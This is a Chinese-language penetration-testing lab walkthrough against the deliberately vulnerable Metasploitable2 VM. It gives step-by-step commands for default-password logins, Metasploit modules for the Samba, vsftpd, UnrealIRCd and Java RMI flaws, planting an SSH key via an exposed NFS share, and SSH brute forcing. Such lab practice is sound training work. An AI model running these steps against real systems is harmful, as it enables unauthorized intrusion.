一、系統弱密碼登錄
1、在kali上執行命令行telnet 192.168.26.129
2、Login和password都輸入msfadmin
3、登錄成功,進入系統
4、測試如下:
?
?
二、MySQL弱密碼登錄:
1、在kali上執行mysql –h 192.168.26.129 ?–u root
2、登錄成功,進入MySQL系統
3、測試效果:
?
三、PostgreSQL弱密碼登錄
1、在Kali上執行psql -h 192.168.26.129 –U postgres
2、輸入密碼:postgres
3、登錄成功,進入postgresql系統
測試效果
四、VNC弱密碼登錄
1、在kali圖形界面的終端中執行vncviewer 192.168.26.129
2、輸入密碼 password
3、登錄成功,進入系統
測試效果:
五、Samba MS-RPC Shell 命令注入漏洞
利用步驟
?1.在kali中執行msfconsole,啟動metasploit
?2.Use exploit/multi/samba/usermap_script,選擇漏洞庫
?3.Set RHOST 192.168.26.129 設置要攻擊的機器IP
?4.Exploit,開始攻擊
?5.利用成功,執行uname –a 驗證
測試效果:
?
六、Vsftpd源碼包后門漏洞
步驟
1、在kali中執行msfconsole,啟動metasploit
2、use exploit/unix/ftp/vsftpd_234_backdoor,選擇漏洞
3、set RHOST 192.168.26.129
4、利用成功,執行uname –a 驗證
5、測試過程:
?
七、UnreallRCd后門漏洞
步驟
1、在kali中執行msfconsole,啟動metasploit
2、use exploit/unix/irc/unreal_ircd_3281_backdoor,選擇漏洞
set RHOST 192.168.26.129 ,設置要攻擊的目標IP地址
3、開始攻擊
4、利用成功!使用uname –a 驗證
測試效果:
?
- 八、Linux NFS共享目錄配置漏洞
問題:在(2)中需要創建 /tmp/test目錄并在目錄下創建,如未創建則不能進行下一步
步驟
- 在kali上執行命令rpcinfo –p 192.168.26.129 ,查看nfs服務有無開啟
- showmount –e 19168.26.129 查看其設置的遠程目錄列表
- 輸入ssh-keygen 生成RSA公鑰
- 依次輸入:
(1)mount –t nfs 192.168.26.129://tmp/test(預先創建),把192.168.160.131的根目錄掛載到/tmp/test/下;
注:如果提示下圖中錯誤則需要/etc/init.d/rpcbind start 來啟動mount
(2)cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公鑰追加到靶機的authorized_keys下:
(3)ssh? root@192.168.26.129,實現無密碼登錄
九、Java RMI SERVER 命令執行漏洞(1099/tcp)
1.Nmap –p 0-65535 192.168.26.129 來查看1099端口是否開啟
2.進入msfconsole框架,依次輸入以下命令:
1)use exploit/multi/misc/java_rmi_server
2)set RHOST 192.168.26.129(靶機的IP地址)
3)run
4)session
5)shell(進入meterpreter時執行)
十、Root用戶弱口令漏洞(SSH爆破)
步驟
- 輸入nmap –sV? -O(大寫) 192.168.26.129 查看SSh端口是否開啟
- 開啟metasploit framework 框架,依次輸入:
- use auxiliary/scanner/ssh/ssh_login
- set RHOSTS 192.168.26.129
- set USERNAME root
- set PASS_FILE? pass.txt(字典文件,需要預先生成)
- set THREADS 50
- run
我在網上找了Metasploitable2? 靶機,下載了解壓出來,打開直接能用
鏈接:https://pan.baidu.com/s/1gV75x5wV4-1TsDTIZoImXw
提取碼:gx9z
?
?